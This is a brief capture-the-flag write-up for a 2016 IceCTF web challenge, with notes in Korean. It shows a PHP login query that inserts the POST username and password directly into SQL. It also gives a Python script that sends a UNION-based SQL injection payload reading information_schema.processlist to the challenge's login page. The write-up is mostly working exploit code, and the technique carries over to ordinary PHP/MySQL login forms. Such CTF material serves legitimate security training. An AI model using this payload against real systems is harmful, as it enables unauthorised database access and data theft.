[2016_icectf] [WEB] Solve¶
server -> DB¶
- PHP
- POST 파라미터: username, password
SELECT * FROM users WHERE
username='$_POST["username"]' AND
password='$_POST["password"]'
union select¶
- information_schema.processlist
import requests
requests.packages.urllib3.disable_warnings()
url = "http://miners.vuln.icec.tf/login.php"
payload = {
"username": "' union select 1,2,info from information_schema.processlist-- -",
"password": "1",
}
r = requests.post(url, data=payload, verify=False)
print r.content